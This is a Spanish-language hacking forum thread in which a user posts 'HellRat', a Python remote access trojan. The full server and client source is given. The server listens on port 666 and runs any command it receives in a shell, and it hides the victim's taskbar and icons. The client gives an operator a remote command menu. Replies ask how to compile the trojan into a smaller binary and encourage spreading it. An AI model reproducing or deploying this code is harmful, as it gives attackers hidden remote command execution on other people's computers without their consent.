comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Python] HellRat By Doddy H

  • 3 Respuestas
  • 1948 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Julio 03, 2011, 09:35:15 pm »
Hola , aca traigo un troyano en python con las siguientes
opciones

  • Ocultar inicio
  • Mostrar inicio
  • Ocultar barra de tereas
  • Mostrar barra de tareas
  • Abrir CD
  • Cerrar CD
  • Ejecutar comandos
  • Mostrar informacion


server.py

Código: Python
  1. #!usr/bin/python
  2. #Hell RAt (C) Doddy Hackman 2011
  3.  
  4. import socket,os,re,win32api,win32gui,win32con,ctypes,subprocess
  5.  
  6. print "\n\n[+] Online\n\n"
  7.  
  8. slave = socket.socket()
  9. slave.bind(("",666))
  10. slave.listen(999)
  11.  
  12. a,b = slave.accept()
  13.  
  14. while True:
  15.  rex = a.recv(20)
  16.  if re.findall("getso",rex):
  17.   z = os.name
  18.   a.send(z)
  19.  if re.findall("getpath",rex):
  20.   h = os.getcwd()
  21.   a.send(h)
  22.  if re.findall("ocultarinicio",rex):
  23.   x = win32gui.FindWindow("Shell_TrayWnd","")
  24.   win32gui.ShowWindow(x,win32con.SW_HIDE)
  25.  elif re.findall("mostrarinicio",rex):
  26.   x = win32gui.FindWindow("Shell_TrayWnd","")
  27.   win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
  28.  elif re.findall("ocultaricono",rex):
  29.   x = win32gui.FindWindow(0,"Program Manager")
  30.   win32gui.ShowWindow(x,win32con.SW_HIDE)
  31.  elif re.findall("mostraricono",rex):
  32.   x = win32gui.FindWindow(0,"Program Manager")
  33.   win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL)
  34.  elif re.findall("abrircd",rex):
  35.   ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door open", None, 0, None)
  36.  elif re.findall("cerrarcd",rex):
  37.   ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door closed", None, 0, None)
  38.  else:
  39.   rea = subprocess.Popen(rex,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
  40.   if re:
  41.    a.send(rea.stdout.read())
  42.   else:
  43.    a.send(rea.stderr.read())
  44.  
  45.  
  46. # The End  
  47.  

cliente.py

Código: Python
  1. #!usr/bin/python
  2. #HellRat (C) Doddy Hackman 2011
  3.  
  4. import os,socket,sys
  5.  
  6. def head():
  7.  print "\n\n-- == hELLrAT == --\n\n"
  8.  
  9. def copyright():
  10.  print "\n\n(C) Doddy Hackman 2011\n\n"
  11.  
  12. def clean():
  13.  if sys.platform=="win32":
  14.   os.system("cls")
  15.  else:
  16.   os.system("clear")
  17.  
  18. def men():
  19.  
  20.  try:
  21.   ip = raw_input("[+] IP : ")  
  22.   client = socket.socket()             
  23.   client.connect((ip,666))
  24.   while True:
  25.    clean()
  26.    print "\n\n[+] Welcome to ",ip,"\n\n"
  27.    print "\n\n[1] Informacion"
  28.    print "[2] CMD"
  29.    print "[3] Abrir CD"
  30.    print "[4] Cerrar CD"
  31.    print "[5] Ocultar iconos"
  32.    print "[6] Mostrar iconos"
  33.    print "[7] Ocultar barra de tareas"
  34.    print "[8] Mostrar barra de tareas"
  35.    print "[9] Cambiar IP"
  36.    print "[10] Salir"
  37.    op = input("\n\n[Opcion] : ")
  38.    if op == 1:
  39.     print "\n\n[+] Informacion\n\n"
  40.     client.send("getso")
  41.     so = client.recv(999)
  42.     client.send("getpath")
  43.     path = client.recv(999)
  44.     print "[+] SO : "+so  
  45.     print "[+] Path : "+path
  46.     raw_input()
  47.    if op == 2:
  48.     cmd = raw_input("\n[CMD] : ")
  49.     client.send(cmd)
  50.     code = client.recv(999)
  51.     print code
  52.     raw_input()
  53.    if op == 3:
  54.     client.send("abrircd")
  55.    if op == 4:
  56.     client.send("cerrarcd")
  57.    if op == 5:
  58.     client.send("ocultaricono")
  59.    if op == 6:
  60.     client.send("mostraricono")
  61.    if op == 7:
  62.     client.send("ocultarinicio")
  63.    if op == 8:
  64.     client.send("mostrarinicio")
  65.    if op == 9:
  66.     men()
  67.    if op == 10:
  68.     client.close()
  69.     copyright()
  70.     raw_input()
  71.     sys.exit(1)
  72.  except:
  73.   print "\n\n[-] Error\n\n"
  74. head()
  75. men()
  76.  
  77. # The End
  78.  
« Última modificación: Enero 25, 2013, 07:28:51 pm por 11Sep »

Desconectado TeNeX

  • *
  • Underc0der
  • Mensajes: 41
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Junio 01, 2013, 09:54:30 pm »
Hola, estaba leyendo en el foro que alguien mencionó: "lo malo de python es que para un troyano o cualquier otra cosa debes tener el interprete, ya que si lo compilas, el binario tiende a pesar demasiado"

lo cual me hizo preguntarme:

1.- habrá algún tipo de optimización?
2.- probablemente se pueda hacer algo con el .py y cygwin?

creo que la interrogante 1 se responde aqui: No tienes permisos para ver links. Registrate o Entra con tu cuenta donde en realidad esta aplicado a la parte gráfica pero es un inicio, la interrogante 2 aún no la indago

espero este link te ayude a poder compilar tu troyano y reducir el tamaño :)

Desconectado D4rkC0d3r

  • *
  • Underc0der
  • Mensajes: 202
  • Actividad:
    0%
  • Reputación 0
  • \xeb\x16\x5e\x31\xd2\
    • Ver Perfil
    • Ethical Hacking, Malware Analysis, Disinfection Techniques and more...
« Respuesta #2 en: Junio 01, 2013, 10:58:07 pm »
Gracias por el aporte, muy bueno!!!  :D

D4rkC0d3r

Desconectado TeNeX

  • *
  • Underc0der
  • Mensajes: 41
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Junio 02, 2013, 12:18:41 am »
:) si pueden copiarlo (algun admin) a un sitio que ayude a mas :) seria bueno

 

¿Te gustó el post? COMPARTILO!



[Código] Yardas a metros - Metros a yardas [Python]

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 1420
Último mensaje Mayo 29, 2011, 01:27:34 am
por LucaSthefano
Python keylogger - by "bLiNdFiR3"

Iniciado por d33k40

Respuestas: 0
Vistas: 2059
Último mensaje Abril 07, 2010, 03:30:22 am
por d33k40
Python phpmyadmin "BruteForce"

Iniciado por linkgl

Respuestas: 2
Vistas: 2548
Último mensaje Agosto 19, 2011, 12:14:37 pm
por linkgl
[Código] Entero / No Entero [Ejercicio - Python]

Iniciado por LucaSthefano

Respuestas: 0
Vistas: 1388
Último mensaje Mayo 29, 2011, 01:24:09 am
por LucaSthefano
Python Trojan - By "bLiNdFiR3"

Iniciado por d33k40

Respuestas: 1
Vistas: 2112
Último mensaje Abril 03, 2010, 11:01:59 pm
por Dharok